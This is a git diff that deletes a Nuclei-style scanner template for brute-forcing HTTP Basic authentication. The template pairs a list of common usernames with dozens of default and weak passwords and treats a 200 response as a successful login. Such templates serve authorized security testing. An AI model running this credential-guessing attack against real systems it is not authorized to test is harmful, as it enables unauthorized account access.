diff --git a/fuzzing/basic-auth-bruteforce.yaml b/fuzzing/basic-auth-bruteforce.yaml deleted file mode 100644 index 3ec202210b..0000000000 --- a/fuzzing/basic-auth-bruteforce.yaml +++ /dev/null @@ -1,98 +0,0 @@ -id: basic-auth-bruteforce - -info: - name: Basic Auth Bruteforce - author: w4cky_ - severity: high - - # Impotent Notes:- - # This is specific template to work with basic 401 authentication endpoint. - # Do not run this template on non basic authentication related endpoints to avoid false positive results. - -requests: - - - payloads: - username: - - admin - - manager - - administrator - - username - - login - - anonymous - - test - - guest - - root - - demo - - password: - - admin - - pass1 - - pass1 - - root - - welcome - - p@ssw0rd - - user - - test - - testest - - dupa8 - - admin123 - - admin1234 - - admin12345 - - anonymous - - manager - - linux - - system - - oracle - - administrator - - 11111111 - - qwerty123 - - cisco123 - - admin123456 - - 1qazXSW@ - - master - - 123qweasd - - 1qaz2wsx - - 123456789 - - 1234567890 - - !qaz@wsx - - !q@w - - wubao - - pa55w0rd - - 123abc - - 123456 - - 123456789 - - qwerty - - password - - 1111111 - - 12345678 - - abc123 - - 1234567 - - password1 - - 12345 - - 1234567890 - - 123123 - - 000000 - - Iloveyou - - 1234 - - 1q2w3e4r5t - - Qwertyuiop - - 123 - - Monkey - - Dragon - - demo - - attack: clusterbomb - - raw: - - | - GET /protected HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Language: en-US,en;q=0.9 - Connection: close - - matchers: - - type: status - status: - - 200 \ No newline at end of file